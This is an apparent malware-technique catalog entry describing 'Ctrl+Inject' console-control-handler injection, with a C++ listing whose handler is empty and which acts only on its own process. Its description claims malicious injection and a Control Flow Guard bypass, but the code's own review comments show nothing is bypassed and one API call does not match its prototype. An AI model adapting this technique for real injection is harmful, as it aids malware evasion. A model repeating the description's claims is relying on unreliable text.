Windows C++ / Ctrl+Inject

Author Unprotect
Platform Windows
Language C++
Technique Ctrl+Inject

Description:

This code first defines a callback function called ControlSignalHandler that will be used to inject malicious code. It then bypasses pointer encoding and Control Flow Guard to ensure that the function can be called. Finally, it registers the callback as a control signal handler using the SetConsoleCtrlHandler function and triggers a control signal by calling GenerateConsoleCtrlEvent.

Code

#include <Windows.h>
#include <cstdio>

// Console control handler registered by main() via SetConsoleCtrlHandler.
// The handler body is empty in this listing; returning TRUE reports the
// event as handled to the console subsystem.
BOOL WINAPI ControlSignalHandler(DWORD dwCtrlType)
{
    (void)dwCtrlType; // the event type is not inspected here

    return TRUE;
}

// Demonstration entry point. Everything below operates on the current
// process only: the handler is registered in this process and the generated
// Ctrl+C is delivered back to this same process. No remote process is
// touched by this listing.
int main()
{
    // Round-trip of the handler address through this process's own pointer
    // cookie. EncodePointer followed by DecodePointer in the same process
    // yields the original address, so decodedPointer == ControlSignalHandler
    // and nothing is actually bypassed here; the comment is misleading.
    void* encodedPointer = EncodePointer((PVOID)ControlSignalHandler);
    void* decodedPointer = DecodePointer(encodedPointer);

    // NOTE(review): the documented prototype of SetProcessValidCallTargets
    // takes five arguments (hProcess, VirtualAddress, RegionSize,
    // NumberOfOffsets, OffsetInformation); this three-argument call does not
    // match it, and its return value is unchecked. It also targets only the
    // current process, where ControlSignalHandler is already part of the
    // executable image. Confirm against the SDK header before relying on it.
    SetProcessValidCallTargets(GetCurrentProcess(), (UINT_PTR)decodedPointer, sizeof(void*));

    // Registers the handler for this process's console; the BOOL result is
    // not checked, so a failed registration goes unnoticed.
    SetConsoleCtrlHandler((PHANDLER_ROUTINE)decodedPointer, TRUE);

    // Raises CTRL_C_EVENT with process group id 0, i.e. every process sharing
    // this console, which includes this one, so the handler above runs
    // in-process. Return value is not checked.
    GenerateConsoleCtrlEvent(CTRL_C_EVENT, 0);

    return 0;
}

Created

December 29, 2022

Last Revised

April 22, 2024